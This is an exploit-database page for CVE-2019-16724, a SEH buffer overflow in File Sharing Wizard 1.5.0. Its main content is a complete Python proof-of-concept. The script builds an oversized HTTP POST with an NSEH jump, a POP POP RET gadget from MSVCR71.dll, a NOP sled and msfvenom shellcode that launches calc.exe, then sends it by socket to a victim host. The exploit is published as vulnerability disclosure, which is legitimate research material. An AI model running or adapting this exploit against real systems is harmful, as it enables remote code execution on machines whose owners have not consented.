File Sharing Wizard 1.5.0 SEH Buffer Overflow

2019.09.25
Credit: x00pwn
Risk: High
Local: Yes
Remote: No
CVE: CVE-2019-16724
CWE: CWE-119


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

import socket from struct import * # Exploit Title: File sharing wizard 'post' remote SEH overflow # Date: 9/23/2019 # Exploit Author: x00pwn # Software Link: https://file-sharing-wizard.soft112.com/ # Version: 1.5.0 # Tested on: Windows 7 # CVE : CVE-2019-16724 # File-sharing-wizard-seh #----------------------------------------------# # Bad characters: \x00 # # SEH value: 0x909032EB (JMP short) # # NSEH value: 0x7c38a67f (POP POP RET) # #----------------------------------------------# # Assigned CVE ID : CVE-2019-16724 victim_host = "10.0.0.17" victim_port = 80 # msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f python -v shellcode EXITFUNC=seh shellcode = "" shellcode += "\xd9\xc7\xd9\x74\x24\xf4\xba\x65\x1d\x84\xe1\x5f" shellcode += "\x29\xc9\xb1\x31\x31\x57\x18\x03\x57\x18\x83\xef" shellcode += "\x99\xff\x71\x1d\x89\x82\x7a\xde\x49\xe3\xf3\x3b" shellcode += "\x78\x23\x67\x4f\x2a\x93\xe3\x1d\xc6\x58\xa1\xb5" shellcode += "\x5d\x2c\x6e\xb9\xd6\x9b\x48\xf4\xe7\xb0\xa9\x97" shellcode += "\x6b\xcb\xfd\x77\x52\x04\xf0\x76\x93\x79\xf9\x2b" shellcode += "\x4c\xf5\xac\xdb\xf9\x43\x6d\x57\xb1\x42\xf5\x84" shellcode += "\x01\x64\xd4\x1a\x1a\x3f\xf6\x9d\xcf\x4b\xbf\x85" shellcode += "\x0c\x71\x09\x3d\xe6\x0d\x88\x97\x37\xed\x27\xd6" shellcode += "\xf8\x1c\x39\x1e\x3e\xff\x4c\x56\x3d\x82\x56\xad" shellcode += "\x3c\x58\xd2\x36\xe6\x2b\x44\x93\x17\xff\x13\x50" shellcode += "\x1b\xb4\x50\x3e\x3f\x4b\xb4\x34\x3b\xc0\x3b\x9b" shellcode += "\xca\x92\x1f\x3f\x97\x41\x01\x66\x7d\x27\x3e\x78" shellcode += "\xde\x98\x9a\xf2\xf2\xcd\x96\x58\x98\x10\x24\xe7" shellcode += "\xee\x13\x36\xe8\x5e\x7c\x07\x63\x31\xfb\x98\xa6" shellcode += "\x76\xfd\x69\x7b\x62\x6a\xd0\xee\xcf\xf6\xe3\xc4" shellcode += "\x13\x0f\x60\xed\xeb\xf4\x78\x84\xee\xb1\x3e\x74" shellcode += "\x82\xaa\xaa\x7a\x31\xca\xfe\x18\xd4\x58\x62\xf1" shellcode += "\x73\xd9\x01\x0d" nseh = pack ('<I',0x909032EB) # Short jump forward 32 places into NOP sled seh = pack('I',0x7c38a67f) # POP POP RET # 0x7c38a67f : pop ecx # pop ecx # ret | {PAGE_EXECUTE_READ} [MSVCR71.dll] # ASLR: False, Rebase: False, SafeSEH: False, OS: False, v7.10.6030.0 (C:\Program Files (x86)\File Sharing Wizard\bin\MSVCR71.dll) exploit_payload = "A" * 1040 exploit_payload += nseh # JMP short exploit_payload += seh # POPPOPRET exploit_payload += "\x90" * 100 # NOPSLED exploit_payload += shellcode # popping calc.exe exploit_payload += "D" *(5000 - len(exploit_payload)) payload_header = "POST " + exploit_payload payload_header +=" HTTP/1.0\r\n\r\n" # overflowed SEH handler - 42386942 : [*] Exact match at offset 1044 try: print(""" -------------------------------- CVE-2019-16724 proof of concept File sharing wizard SEH overflow -------------------------------- """) expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print("[x] Setting up a socket connection") expl.connect((victim_host, victim_port)) print("[x] Establishing a connection to the victim") expl.send(payload_header) print("[x] Sending ") except: print("[!] Error establishing a connection") print("[!] Error sending exploit")


See this note in RAW Version
Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top